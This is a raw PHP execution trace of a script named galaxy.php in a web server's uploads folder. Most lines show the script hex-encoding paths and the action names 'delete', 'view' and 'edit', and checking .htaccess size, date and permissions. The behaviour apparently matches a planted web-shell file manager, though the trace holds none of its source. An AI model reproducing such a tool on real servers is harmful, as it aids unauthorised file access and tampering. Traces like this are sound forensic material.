3	789	0	0.028166	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	789	1	0.028178	484944
3	789	R			108
3	790	0	0.028190	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	790	1	0.028202	484976
3	790	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	791	0	0.028232	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	791	1	0.028244	484944
3	791	R			101
3	792	0	0.028256	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	792	1	0.028268	484976
3	792	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	793	0	0.028297	484912	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	793	1	0.028309	484952
3	793	R			116
3	794	0	0.028321	484912	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	794	1	0.028333	484984
3	794	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	795	0	0.028362	484912	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	795	1	0.028374	484952
3	795	R			101
3	796	0	0.028386	484912	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	796	1	0.028397	484984
3	796	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	784	1	0.028426	484912
2	784	R			'64656c657465'
2	797	0	0.028441	484872	hex	1		/var/www/html/uploads/galaxy.php	110	1	'data'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	798	0	0.028473	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	798	1	0.028484	484912
3	798	R			100
3	799	0	0.028497	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	799	1	0.028512	484944
3	799	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	800	0	0.028542	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	800	1	0.028552	484944
3	800	R			97
3	801	0	0.028564	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	801	1	0.028576	484976
3	801	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	802	0	0.028606	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	802	1	0.028617	484944
3	802	R			116
3	803	0	0.028629	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	803	1	0.028641	484976
3	803	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	804	0	0.028669	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	804	1	0.028680	484944
3	804	R			97
3	805	0	0.028692	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	805	1	0.028703	484976
3	805	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	797	1	0.028733	484912
2	797	R			'64617461'
2	806	0	0.028750	484296	is_dir	0		/var/www/html/uploads/galaxy.php	109	1	'/var/www/html/uploads/galaxy.php'
2	806	1	0.028772	484344
2	806	R			FALSE
2	807	0	0.028786	484304	is_dir	0		/var/www/html/uploads/galaxy.php	109	1	'/var/www/html/uploads/prepend.php'
2	807	1	0.028801	484344
2	807	R			FALSE
2	808	0	0.028816	484296	is_file	0		/var/www/html/uploads/galaxy.php	113	1	'/var/www/html/uploads/.htaccess'
2	808	1	0.028832	484328
2	808	R			TRUE
2	809	0	0.028845	484288	filesize	0		/var/www/html/uploads/galaxy.php	114	1	'/var/www/html/uploads/.htaccess'
2	809	1	0.028862	484328
2	809	R			64
1		A						/var/www/html/uploads/galaxy.php	114	$sz = 0.0625
2	810	0	0.028945	484232	round	0		/var/www/html/uploads/galaxy.php	115	2	0.0625	3
2	810	1	0.028963	484304
2	810	R			0.063
1		A						/var/www/html/uploads/galaxy.php	115	$sz = 0.063
1		A						/var/www/html/uploads/galaxy.php	116	$sz = '0.063KB'
2	811	0	0.029001	484264	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	812	0	0.029033	484264	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	812	1	0.029045	484304
3	812	R			47
3	813	0	0.029057	484264	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	813	1	0.029068	484336
3	813	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	814	0	0.029099	484296	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	814	1	0.029111	484336
3	814	R			118
3	815	0	0.029123	484296	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	815	1	0.029135	484368
3	815	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	816	0	0.029164	484296	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	816	1	0.029176	484336
3	816	R			97
3	817	0	0.029188	484296	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	817	1	0.029199	484368
3	817	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	818	0	0.029229	484296	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	818	1	0.029240	484336
3	818	R			114
3	819	0	0.029252	484296	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	819	1	0.029263	484368
3	819	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	820	0	0.029292	484304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	820	1	0.029304	484344
3	820	R			47
3	821	0	0.029316	484304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	821	1	0.029327	484376
3	821	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	822	0	0.029361	484304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	822	1	0.029372	484344
3	822	R			119
3	823	0	0.029384	484304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	823	1	0.029395	484376
3	823	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	824	0	0.029424	484304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	824	1	0.029436	484344
3	824	R			119
3	825	0	0.029448	484304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	825	1	0.029459	484376
3	825	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	826	0	0.029488	484304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	826	1	0.029499	484344
3	826	R			119
3	827	0	0.029511	484304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	827	1	0.029523	484376
3	827	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	828	0	0.029551	484312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	828	1	0.029562	484352
3	828	R			47
3	829	0	0.029574	484312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	829	1	0.029585	484384
3	829	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	830	0	0.029614	484312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	830	1	0.029625	484352
3	830	R			104
3	831	0	0.029637	484312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	831	1	0.029648	484384
3	831	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	832	0	0.029677	484312	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	832	1	0.029688	484352
3	832	R			116
3	833	0	0.029700	484312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	833	1	0.029711	484384
3	833	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	834	0	0.029740	484312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	834	1	0.029751	484352
3	834	R			109
3	835	0	0.029763	484312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	835	1	0.029775	484384
3	835	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	836	0	0.029804	484320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	836	1	0.029815	484360
3	836	R			108
3	837	0	0.029827	484320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	837	1	0.029838	484392
3	837	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	838	0	0.029867	484320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	838	1	0.029878	484360
3	838	R			47
3	839	0	0.029890	484320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	839	1	0.029901	484392
3	839	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	840	0	0.029930	484320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	840	1	0.029941	484360
3	840	R			117
3	841	0	0.029953	484320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	841	1	0.029964	484392
3	841	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	842	0	0.029993	484320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	842	1	0.030005	484360
3	842	R			112
3	843	0	0.030017	484320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	843	1	0.030028	484392
3	843	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	844	0	0.030061	484328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	844	1	0.030073	484368
3	844	R			108
3	845	0	0.030084	484328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	845	1	0.030095	484400
3	845	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	846	0	0.030124	484328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	846	1	0.030135	484368
3	846	R			111
3	847	0	0.030146	484328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	847	1	0.030157	484400
3	847	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	848	0	0.030186	484328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	848	1	0.030197	484368
3	848	R			97
3	849	0	0.030209	484328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	849	1	0.030220	484400
3	849	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	850	0	0.030249	484328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	850	1	0.030259	484368
3	850	R			100
3	851	0	0.030271	484328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	851	1	0.030282	484400
3	851	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	852	0	0.030311	484344	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	852	1	0.030322	484384
3	852	R			115
3	853	0	0.030334	484344	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	853	1	0.030345	484416
3	853	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	811	1	0.030373	484344
2	811	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	854	0	0.030388	484360	hex	1		/var/www/html/uploads/galaxy.php	117	1	'view'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	855	0	0.030420	484360	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	855	1	0.030431	484400
3	855	R			118
3	856	0	0.030443	484360	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	856	1	0.030454	484432
3	856	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	857	0	0.030484	484392	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	857	1	0.030495	484432
3	857	R			105
3	858	0	0.030507	484392	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	858	1	0.030518	484464
3	858	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	859	0	0.030547	484392	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	859	1	0.030558	484432
3	859	R			101
3	860	0	0.030570	484392	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	860	1	0.030582	484464
3	860	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	861	0	0.030610	484392	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	861	1	0.030622	484432
3	861	R			119
3	862	0	0.030633	484392	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	862	1	0.030645	484464
3	862	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	854	1	0.030674	484400
2	854	R			'76696577'
2	863	0	0.030687	484376	hex	1		/var/www/html/uploads/galaxy.php	117	1	'.htaccess'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	864	0	0.030718	484376	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	864	1	0.030729	484416
3	864	R			46
3	865	0	0.030742	484376	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	865	1	0.030756	484448
3	865	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	866	0	0.030787	484408	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	866	1	0.030805	484448
3	866	R			104
3	867	0	0.030817	484408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	867	1	0.030829	484480
3	867	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	868	0	0.030858	484408	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	868	1	0.030870	484448
3	868	R			116
3	869	0	0.030882	484408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	869	1	0.030893	484480
3	869	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	870	0	0.030922	484408	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	870	1	0.030933	484448
3	870	R			97
3	871	0	0.030945	484408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	871	1	0.030956	484480
3	871	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	872	0	0.030985	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	872	1	0.030997	484456
3	872	R			99
3	873	0	0.031009	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	873	1	0.031020	484488
3	873	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	874	0	0.031048	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	874	1	0.031059	484456
3	874	R			99
3	875	0	0.031071	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	875	1	0.031082	484488
3	875	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	876	0	0.031111	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	876	1	0.031122	484456
3	876	R			101
3	877	0	0.031134	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	877	1	0.031145	484488
3	877	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	878	0	0.031174	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	878	1	0.031185	484456
3	878	R			115
3	879	0	0.031197	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	879	1	0.031208	484488
3	879	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	880	0	0.031236	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	880	1	0.031248	484464
3	880	R			115
3	881	0	0.031260	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	881	1	0.031271	484496
3	881	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	863	1	0.031300	484424
2	863	R			'2e6874616363657373'
2	882	0	0.031314	484512	filemtime	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/.htaccess'
2	882	1	0.031328	484552
2	882	R			1676246275
2	883	0	0.031341	484456	date	0		/var/www/html/uploads/galaxy.php	117	2	'Y-m-d H:i'	1676246275
2	883	1	0.031376	484784
2	883	R			'2023-02-12 18:57'
2	884	0	0.031391	484640	is_writable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/.htaccess'
2	884	1	0.031411	484680
2	884	R			FALSE
2	885	0	0.031425	484640	is_readable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/.htaccess'
2	885	1	0.031440	484680
2	885	R			TRUE
2	886	0	0.031454	484640	perms	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/.htaccess'
3	887	0	0.031468	484640	fileperms	0		/var/www/html/uploads/galaxy.php	29	1	'/var/www/html/uploads/.htaccess'
3	887	1	0.031480	484680
3	887	R			33188
2		A						/var/www/html/uploads/galaxy.php	29	$p = 33188
2		A						/var/www/html/uploads/galaxy.php	32	$i = '-'
2		A						/var/www/html/uploads/galaxy.php	39	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	40	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	41	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	42	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	43	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	44	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	45	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	46	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	47	$i .= '-'
2	886	1	0.031600	484680
2	886	R			'-rw-r--r--'
2	888	0	0.031614	484648	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	889	0	0.031645	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	889	1	0.031656	484688
3	889	R			47
3	890	0	0.031669	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	890	1	0.031681	484720
3	890	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	891	0	0.031711	484680	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	891	1	0.031723	484720
3	891	R			118
3	892	0	0.031735	484680	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	892	1	0.031746	484752
3	892	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	893	0	0.031776	484680	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	893	1	0.031788	484720
3	893	R			97
3	894	0	0.031799	484680	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	894	1	0.031810	484752
3	894	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	895	0	0.031840	484680	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	895	1	0.031852	484720
3	895	R			114
3	896	0	0.031864	484680	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	896	1	0.031875	484752
3	896	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	897	0	0.031904	484688	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	897	1	0.031915	484728
3	897	R			47
3	898	0	0.031927	484688	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	898	1	0.031939	484760
3	898	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	899	0	0.031968	484688	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	899	1	0.031979	484728
3	899	R			119
3	900	0	0.031991	484688	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	900	1	0.032003	484760
3	900	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	901	0	0.032032	484688	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	901	1	0.032043	484728
3	901	R			119
3	902	0	0.032055	484688	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	902	1	0.032066	484760
3	902	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	903	0	0.032096	484688	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	903	1	0.032107	484728
3	903	R			119
3	904	0	0.032119	484688	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	904	1	0.032130	484760
3	904	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	905	0	0.032159	484696	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	905	1	0.032170	484736
3	905	R			47
3	906	0	0.032182	484696	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	906	1	0.032194	484768
3	906	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	907	0	0.032226	484696	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	907	1	0.032237	484736
3	907	R			104
3	908	0	0.032249	484696	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	908	1	0.032261	484768
3	908	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	909	0	0.032290	484696	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	909	1	0.032301	484736
3	909	R			116
3	910	0	0.032313	484696	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	910	1	0.032324	484768
3	910	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	911	0	0.032353	484696	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	911	1	0.032365	484736
3	911	R			109
3	912	0	0.032377	484696	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	912	1	0.032388	484768
3	912	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	913	0	0.032417	484704	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	913	1	0.032429	484744
3	913	R			108
3	914	0	0.032441	484704	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	914	1	0.032452	484776
3	914	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	915	0	0.032481	484704	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	915	1	0.032492	484744
3	915	R			47
3	916	0	0.032504	484704	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	916	1	0.032516	484776
3	916	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	917	0	0.032545	484704	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	917	1	0.032556	484744
3	917	R			117
3	918	0	0.032568	484704	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	918	1	0.032580	484776
3	918	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	919	0	0.032609	484704	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	919	1	0.032620	484744
3	919	R			112
3	920	0	0.032632	484704	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	920	1	0.032643	484776
3	920	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	921	0	0.032672	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	921	1	0.032683	484752
3	921	R			108
3	922	0	0.032695	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	922	1	0.032707	484784
3	922	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	923	0	0.032735	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	923	1	0.032747	484752
3	923	R			111
3	924	0	0.032759	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	924	1	0.032770	484784
3	924	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	925	0	0.032798	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	925	1	0.032810	484752
3	925	R			97
3	926	0	0.032821	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	926	1	0.032832	484784
3	926	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	927	0	0.032864	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	927	1	0.032875	484752
3	927	R			100
3	928	0	0.032928	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	928	1	0.032942	484784
3	928	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	929	0	0.032976	484728	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	929	1	0.032989	484768
3	929	R			115
3	930	0	0.033001	484728	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	930	1	0.033012	484800
3	930	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	888	1	0.033042	484728
2	888	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	931	0	0.033057	484712	hex	1		/var/www/html/uploads/galaxy.php	117	1	'edit'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	932	0	0.033088	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	932	1	0.033099	484752
3	932	R			101
3	933	0	0.033111	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	933	1	0.033123	484784
3	933	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	934	0	0.033152	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	934	1	0.033163	484784
3	934	R			100
3	935	0	0.033175	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	935	1	0.033186	484816
3	935	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
